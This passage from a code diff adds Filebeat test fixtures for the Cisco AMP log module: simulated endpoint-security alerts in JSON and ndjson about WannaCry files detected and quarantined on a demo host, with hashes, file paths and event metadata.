2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88168, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 89361, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239046651838535", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239050946806000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90868, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814971", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 91988, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93180, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 773000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 94365, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782277", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 95638, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 570000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 96911, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782275", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 414000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 98184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782274", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 368000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 99457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782273", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 134000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 100730, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782272", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 102003, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782271", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103275, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782270", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104547, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log new file mode 100644 index 00000000000..6ccff00d38b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log @@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 